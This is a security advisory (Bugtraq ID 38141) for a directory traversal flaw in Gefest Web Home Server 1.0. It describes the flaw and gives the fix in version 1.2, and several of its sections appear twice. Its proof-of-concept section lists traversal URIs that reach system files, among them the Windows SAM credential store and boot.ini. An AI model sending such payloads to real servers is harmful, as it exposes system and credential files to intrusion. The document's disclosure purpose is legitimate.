GeFest Web Home Server Remote Directory Traversal Vulnerability
BID:38141
Info
GeFest Web Home Server Remote Directory Traversal Vulnerability
| Bugtraq ID: | 38141 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 08 2010 12:00AM |
| Updated: | Feb 08 2010 12:00AM |
| Credit: | MarkoT |
| Vulnerable: |
Gefest Gefest Web Home Server 1.0 |
| Not Vulnerable: |
Gefest Gefest Web Home Server 1.2 |
Discussion
GeFest Web Home Server Remote Directory Traversal Vulnerability
Gefest Web Home Server is prone to a remote directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting this issue will allow an attacker to view arbitrary local files within the context of the webserver. Information harvested may aid in launching further attacks.
Gefest Web Home Server 1.0 is vulnerable; other versions may also be affected.
Gefest Web Home Server is prone to a remote directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting this issue will allow an attacker to view arbitrary local files within the context of the webserver. Information harvested may aid in launching further attacks.
Gefest Web Home Server 1.0 is vulnerable; other versions may also be affected.
Exploit / POC
GeFest Web Home Server Remote Directory Traversal Vulnerability
An attacker can use a browser to exploit this issue.
The following example URIs are available:
http://www.example.com/\../\../\../WINDOWS\SYSTEM32\calc.exe
http://www.example.com/\../\../\../WINDOWS\SYSTEM32\config\sam
http://www.example.com/\../\../\../WINDOWS\SYSTEM32
http://www.example.com/\../\../\../boot.ini
An attacker can use a browser to exploit this issue.
The following example URIs are available:
http://www.example.com/\../\../\../WINDOWS\SYSTEM32\calc.exe
http://www.example.com/\../\../\../WINDOWS\SYSTEM32\config\sam
http://www.example.com/\../\../\../WINDOWS\SYSTEM32
http://www.example.com/\../\../\../boot.ini
Solution / Fix
GeFest Web Home Server Remote Directory Traversal Vulnerability
Solution:
This issue is fixed in Gefest Web Home Server 1.2.
Gefest Gefest Web Home Server 1.0
Solution:
This issue is fixed in Gefest Web Home Server 1.2.
Gefest Gefest Web Home Server 1.0
-
Gefest GefestWS_win_jre.exe
http://clearweb.org.ua/gefest/GefestWS_win_jre.exe
References
GeFest Web Home Server Remote Directory Traversal Vulnerability
References:
References: